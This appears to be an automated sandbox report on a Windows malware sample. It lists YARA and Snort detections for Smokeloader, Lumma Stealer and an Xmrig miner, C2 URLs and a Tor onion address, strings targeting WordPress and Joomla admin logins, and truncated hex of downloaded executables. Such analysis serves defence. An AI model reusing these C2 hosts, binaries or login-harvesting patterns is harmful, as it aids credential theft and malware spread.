                      Source: Yara matchFile source: 29.3.288c47bbc1871b439df19ff4df68f076.exe.3670000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 29.2.288c47bbc1871b439df19ff4df68f076.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000001D.00000002.1932113759.0000000000843000.00000040.00000001.01000000.00000015.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001D.00000003.1834912962.0000000003AB2000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001D.00000002.1943821340.00000000031C3000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Yara detected Xmrig cryptocurrency miner
                      Source: Yara matchFile source: sslproxydump.pcap, type: PCAP

                      Compliance

                      barindex
                      Detected unpacking (overwrites its own PE header)
                      Source: C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exeUnpacked PE file: 26.2.anyburnfree.exe.400000.0.unpack
                      Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exeUnpacked PE file: 29.2.288c47bbc1871b439df19ff4df68f076.exe.400000.0.unpack
                      Source: IIBXMzS0zN.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: C:\Users\user\Desktop\IIBXMzS0zN.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                      Source: unknownHTTPS traffic detected: 172.67.217.100:443 -> 192.168.2.3:49714 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.21.80.171:443 -> 192.168.2.3:49715 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.21.16.152:443 -> 192.168.2.3:49719 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.21.58.31:443 -> 192.168.2.3:49722 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.21.83.220:443 -> 192.168.2.3:49724 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.21.83.220:443 -> 192.168.2.3:49725 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 199.58.81.140:443 -> 192.168.2.3:49743 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 131.188.40.189:443 -> 192.168.2.3:49752 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 103.20.213.70:443 -> 192.168.2.3:49754 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 192.42.116.17:443 -> 192.168.2.3:49797 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 86.59.21.38:443 -> 192.168.2.3:49864 version: TLS 1.2
                      Source: C:\Users\user\AppData\Local\Temp\is-P7ABK.tmp\78A4.tmpCode function: 18_2_00462578 FindFirstFileA,FindNextFileA,FindClose,18_2_00462578
                      Source: C:\Users\user\AppData\Local\Temp\is-P7ABK.tmp\78A4.tmpCode function: 18_2_00452A34 FindFirstFileA,GetLastError,18_2_00452A34
                      Source: C:\Users\user\AppData\Local\Temp\is-P7ABK.tmp\78A4.tmpCode function: 18_2_00474D70 FindFirstFileA,FindNextFileA,FindClose,18_2_00474D70
                      Source: C:\Users\user\AppData\Local\Temp\is-P7ABK.tmp\78A4.tmpCode function: 18_2_004975B0 FindFirstFileA,SetFileAttributesA,FindNextFileA,FindClose,18_2_004975B0
                      Source: C:\Users\user\AppData\Local\Temp\is-P7ABK.tmp\78A4.tmpCode function: 18_2_00463B04 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,18_2_00463B04
                      Source: C:\Users\user\AppData\Local\Temp\is-P7ABK.tmp\78A4.tmpCode function: 18_2_00463F80 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,18_2_00463F80

                      Networking

                      barindex
                      Snort IDS alert for network traffic
                      Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.3:49711 -> 91.215.85.120:80
                      Source: TrafficSnort IDS: 2050567 ET TROJAN Lumma Stealer Related CnC Domain in DNS Lookup (gemcreedarticulateod .shop) 192.168.2.3:54225 -> 1.1.1.1:53
                      Source: TrafficSnort IDS: 2050574 ET TROJAN Observed Lumma Stealer Related Domain (gemcreedarticulateod .shop in TLS SNI) 192.168.2.3:49715 -> 104.21.80.171:443
                      Source: TrafficSnort IDS: 2019714 ET CURRENT_EVENTS Terse alphanumeric executable downloader high likelihood of being hostile 192.168.2.3:49717 -> 172.67.221.35:80
                      C2 URLs / IPs found in malware configuration
                      Source: Malware configuration extractorURLs: http://goodfooggooftool.net/index.php
                      Source: Malware configuration extractorURLs: http://sulugilioiu19.net/index.php
                      Source: Malware configuration extractorURLs: http://selebration17io.io/index.php
                      Source: Malware configuration extractorURLs: http://vacantion18ffeu.cc/index.php
                      Source: Malware configuration extractorURLs: http://valarioulinity1.net/index.php
                      Source: Malware configuration extractorURLs: http://buriatiarutuhuob.net/index.php
                      Source: Malware configuration extractorURLs: http://cassiosssionunu.me/index.php
                      Found Tor onion address
                      Source: 5A89.exe, 00000008.00000002.3833746976.0000000000824000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: Referer: X-Requested-With: XMLHttpRequest Content-Type: application/json;127.0.0.1:--ignore-missing-torrcect[] = --SOCKSPort--DataDirectory--bridgehttp://x5outc76j5k4qrzaqdj2m6eq4amkkpndbqyvmvaz6yl4mmfco6oqxsqd.onionT/reg.php?upd.php?/task.php?/rep.phperr.php?&n=v=b=p=repsf=e=nocache=SEH exceptionSEHSTD: C++.dll4kPv6aJG8e\!update!sleep !regcheckcreateObjectwp-login.phpwp-admin/name="loginform"ionW[] = id="loginform"name="log"id="user_login"name="pwd"id="user_pass"administrator/administrator/index.php ] = id="form-login"action="/administrator= = id="mod-login-username"nd[] = name="username"id="mod-login-password" name="passwd"admin.phpDataLifesubactionusernamepasswordOK{
                      Source: unknownNetwork traffic detected: IP country count 17
                      Source: global trafficTCP traffic: 192.168.2.3:49716 -> 95.216.154.139:9001
                      Source: global trafficTCP traffic: 192.168.2.3:49720 -> 91.121.181.6:9001
                      Source: global trafficTCP traffic: 192.168.2.3:49723 -> 116.12.180.234:9443
                      Source: global trafficTCP traffic: 192.168.2.3:49742 -> 5.9.43.211:9001
                      Source: global trafficTCP traffic: 192.168.2.3:49751 -> 213.144.142.24:9001
                      Source: global trafficTCP traffic: 192.168.2.3:49821 -> 194.140.117.58:993
                      Source: global trafficTCP traffic: 192.168.2.3:49822 -> 128.31.0.39:9101
                      Source: global trafficTCP traffic: 192.168.2.3:49867 -> 185.220.101.206:30206
                      Source: global trafficTCP traffic: 192.168.2.3:49874 -> 185.220.101.205:10205
                      Source: global trafficTCP traffic: 192.168.2.3:49885 -> 163.172.182.26:444
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 08 Feb 2024 18:08:48 GMTContent-Type: application/octet-streamContent-Length: 8336105Connection: keep-aliveContent-Description: File TransferContent-Disposition: attachment; filename=may.exeContent-Transfer-Encoding: binaryExpires: 0Cache-Control: must-revalidatePragma: publicCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=mCoei8lNrl3V4iCWf4c5QpfPaxjOGIrvwhmRcJDjudbZNV2tq%2ByvM6X7HEyevUrRrm4Bib8uE6pIvJwtrUch5ZQEbBTS9HxRXYuQowca3Ln6st3dtuwViaHjol%2FgMyrwR9Aj"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8525d1ebdad3b0b5-ATLalt-svc: h3=":443"; ma=86400Data Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 08 00 19 5e 42 2a 00 00 00 00 00 00 00 00 e0 00 8f 81 0b 01 02 19 00 94 00 00 00 46 00 00 00 00 00 00 40 9c 00 00 00 10 00 00 00 b0 00 00 00 00 40 00 00 10 00 00 00 02 00 00 01 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 40 01 00 00 04 00 00 00 00 00 00 02 00 00 80 00 00 10 00 00 40 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 50 09 00 00 00 10 01 00 00 2c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 43 4f 44 45 00 00 00 00 64 93 00 00 00 10 00 00 00 94 00 00 00 04 00 00 00 00 00 00 Data Ascii: MZP@!L!This program must be run under Win32$7PEL^B*F@@@@P,CODEd
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 08 Feb 2024 18:08:52 GMTContent-Type: application/octet-streamContent-Length: 9104384Last-Modified: Fri, 02 Feb 2024 16:13:27 GMTConnection: keep-aliveETag: "65bd14a7-8aec00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 a7 14 bd 65 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 e2 8a 00 00 08 00 00 00 00 00 00 ae 00 8b 00 00 20 00 00 00 20 8b 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 8b 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 60 00 8b 00 4b 00 00 00 00 20 8b 00 40 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 8b 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 b4 e0 8a 00 00 20 00 00 00 e2 8a 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 40 05 00 00 00 20 8b 00 00 06 00 00 00 e4 8a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 40 8b 00 00 02 00 00 00 ea 8a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 00 8b 00 00 00 00 00 48 00 00 00 02 00 05 00 90 ea 8a 00 d0 15 00 00 03 00 00 00 01 00 00 06 d8 27 00 00 b8 c2 8a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 03 00 5f 01 00 00 01 00 00 11 7e 03 00 00 04 2c 0d 28 11 00 00 06 2c 06 16 28 0d 00 00 0a 7e 04 00 00 04 2c 0d 28 13 00 00 06 2c 06 16 28 0d 00 00 0a 7e 05 00 00 04 2c 0d 28 15 00 00 06 2c 06 16 28 0d 00 00 0a 7e 06 00 00 04 2c 0d 28 16 00 00 06 2c 06 16 28 0d 00 00 0a 7e 01 00 00 04 2c 10 7e 02 00 00 04 20 e8 03 00 00 5a 28 0e 00 00 0a 7e 07 00 00 04 2c 11 72 01 00 00 70 72 01 00 00 70 16 28 09 00 00 06 26 16 0a 38 c2 00 00 00 7e 0c 00 00 04 06 6f 0f 00 00 0a 0b 7e 0d 00 00 04 06 6f 0f 00 00 0a 0c 7e 0e 00 00 04 06 6f 0f 00 00 0a 0d 7e 0f 00 00 04 06 6f 0f 00 00 0a 13 04 07 28 08 00 00 06 13 05 7e 0a 00 00 04 2c 09 11 05 28 02 00 00 06 13 05 7e 09 00 00 04 72 03 00 00 70 28 10 00 00 0a 2c 1a 28 11 00 00 0a 72 19 00 00 70 6f 12 00 00 0a 11 05 28 04 00 00 06 13 05 2b 29 7e 09 00 00 04 72 31 00 00 70 28 10 00 00 0a 2c 18 11 05 28 11 00 00 0a 72 19 00 00 70 6f 12 00 00 0a 28 03 00 00 06 13 05 11 04 07 08 28 13 00 00 0a 28 14 00 00
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.24.0Date: Thu, 08 Feb 2024 18:09:03 GMTContent-Type: application/octet-streamConnection: closeContent-Description: File TransferContent-Disposition: attachment; filename=ec6b78d6.exeContent-Transfer-Encoding: binaryExpires: 0Cache-Control: must-revalidatePragma: publicData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 f6 a1 83 dd b2 c0 ed 8e b2 c0 ed 8e b2 c0 ed 8e dd b6 46 8e a7 c0 ed 8e dd b6 73 8e a1 c0 ed 8e dd b6 47 8e ea c0 ed 8e bb b8 7e 8e b7 c0 ed 8e b2 c0 ec 8e d1 c0 ed 8e dd b6 42 8e b3 c0 ed 8e dd b6 77 8e b3 c0 ed 8e dd b6 70 8e b3 c0 ed 8e 52 69 63 68 b2 c0 ed 8e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 08 00 11 7c c2 63 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0a 00 00 28 02 00 00 34 7b 02 00 00 00 00 ac 14 00 00 00 10 00 00 00 40 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 70 7d 02 00 04 00 00 d7 60 03 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 24 68 02 00 3c 00 00 00 00 50 7d 02 30 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 65 02 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 02 00 94 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 e2 26 02 00 00 10 00 00 00 28 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 98 31 00 00 00 40 02 00 00 32 00 00 00 2c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 80 85 7a 02 00 80 02 00 00 1e 00 00 00 5e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 6f 66 69 00 00 00 7c 00 00 00 00 10 7d 02 00 02 00 00 00 7c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 cd 09 00 00 00 20 7d 02 00 0a 00 00 00 7e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 68 6f 70 65 62 0c 00 00 00 00 30 7d 02 00 02 00 00 00 88 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 6a 69 64 65 78 69 00 00 04 00 00 00 40 7d 02 00 04 00 00 00 8a 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 30 1c 00 00 00 50 7d 02 00 1e 00 00 00 8e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 08 Feb 2024 18:09:05 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Thu, 08 Feb 2024 18:00:02 GMTETag: "34e00-610e2949adafe"Accept-Ranges: bytesContent-Length: 216576Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 f6 a1 83 dd b2 c0 ed 8e b2 c0 ed 8e b2 c0 ed 8e dd b6 46 8e a7 c0 ed 8e dd b6 73 8e a1 c0 ed 8e dd b6 47 8e ea c0 ed 8e bb b8 7e 8e b7 c0 ed 8e b2 c0 ec 8e d1 c0 ed 8e dd b6 42 8e b3 c0 ed 8e dd b6 77 8e b3 c0 ed 8e dd b6 70 8e b3 c0 ed 8e 52 69 63 68 b2 c0 ed 8e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 08 00 0e 31 24 63 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0a 00 00 ca 02 00 00 34 7b 02 00 00 00 00 ac 14 00 00 00 10 00 00 00 e0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 10 7e 02 00 04 00 00 02 42 04 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 24 08 03 00 3c 00 00 00 00 f0 7d 02 30 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 05 03 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 02 00 94 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 c9 02 00 00 10 00 00 00 ca 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 98 31 00 00 00 e0 02 00 00 32 00 00 00 ce 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 80 85 7a 02 00 20 03 00 00 1e 00 00 00 00 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 73 6f 77 61 00 00 00 7c 00 00 00 00 b0 7d 02 00 02 00 00 00 1e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 cd 09 00 00 00 c0 7d 02 00 0a 00 00 00 20 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 78 65 79 65 6b 75 73 0c 00 00 00 00 d0 7d 02 00 02 00 00 00 2a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 6a 65 6a 6f 6c 00 00 00 04 00 00 00 e0 7d 02 00 04 00 00 00 2c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 30 1c 00 00 00 f0 7d 02 00 1e 00 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 08 Feb 2024 18:11:05 GMTServer: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15Last-Modified: Thu, 12 Oct 2023 08:02:10 GMTETag: "11ec00-607805b588480"Accept-Ranges: bytesContent-Length: 1174528Connection: closeContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 91 b6 1a 1c d5 d7 74 4f d5 d7 74 4f d5 d7 74 4f 8e bf 70 4e c7 d7 74 4f 8e bf 77 4e de d7 74 4f 8e bf 71 4e 65 d7 74 4f 00 ba 71 4e 90 d7 74 4f 00 ba 70 4e da d7 74 4f 00 ba 77 4e dc d7 74 4f 8e bf 75 4e d8 d7 74 4f d5 d7 75 4f 15 d7 74 4f 4e b9 7d 4e d1 d7 74 4f 4e b9 74 4e d4 d7 74 4f 4e b9 8b 4f d4 d7 74 4f 4e b9 76 4e d4 d7 74 4f 52 69 63 68 d5 d7 74 4f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 07 00 03 a8 27 65 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 0e 18 00 42 0e 00 00 e8 03 00 00 00 00 00 78 d8 0b 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 12 00 00 04 00 00 00 00 00 00 02 00 60 01 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 10 f5 10 00 58 00 00 00 68 f5 10 00 8c 00 00 00 00 50 12 00 f8 00 00 00 00 90 11 00 fc a2 00 00 00 00 00 00 00 00 00 00 00 60 12 00 10 15 00 00 60 1d 10 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 1d 10 00 08 01 00 00 00 00 00 00 00 00 00 00 00 60 0e 00 e8 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 08 40 0e 00 00 10 00 00 00 42 0e 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d2 a9 02 00 00 60 0e 00 00 aa 02 00 00 46 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 8c 7f 00 00 00 10 11 00 00 3e 00 00 00 f0 10 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 fc a2 00 00 00 90 11 00 00 a4 00 00 00 2e 11 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 5f 52 44 41 54 41 00 00 94 00 00 00 00 40 12 00 00 02 00 00 00 d2 11 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 f8 00 00 00 00 50 12 00 00 02 00 00 00 d4 11 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 15 00 00 00 60 12 00 00 16 00 00 00 d6 11 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 08 Feb 2024 18:11:50 GMTServer: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15Last-Modified: Thu, 12 Oct 2023 08:02:12 GMTETag: "19800-607805b770900"Accept-Ranges: bytesContent-Length: 104448Connection: closeContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 27 f6 04 b3 63 97 6a e0 63 97 6a e0 63 97 6a e0 38 ff 69 e1 69 97 6a e0 38 ff 6f e1 eb 97 6a e0 38 ff 6e e1 71 97 6a e0 b6 fa 6e e1 6c 97 6a e0 b6 fa 69 e1 72 97 6a e0 b6 fa 6f e1 42 97 6a e0 38 ff 6b e1 64 97 6a e0 63 97 6b e0 02 97 6a e0 f8 f9 63 e1 60 97 6a e0 f8 f9 6a e1 62 97 6a e0 f8 f9 95 e0 62 97 6a e0 f8 f9 68 e1 62 97 6a e0 52 69 63 68 63 97 6a e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 04 a8 27 65 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 18 00 0e 01 00 00 92 00 00 00 00 00 00 d0 66 00 00 00 10 00 00 00 20 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 e0 01 00 00 04 00 00 00 00 00 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 60 7a 01 00 9c 00 00 00 fc 7a 01 00 50 00 00 00 00 b0 01 00 f8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 01 00 dc 12 00 00 e0 6e 01 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 6f 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 48 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 06 0c 01 00 00 10 00 00 00 0e 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 60 62 00 00 00 20 01 00 00 64 00 00 00 12 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 04 17 00 00 00 90 01 00 00 0c 00 00 00 76 01 00 00 00 00 00 00 00 00 00 00 00 00 00 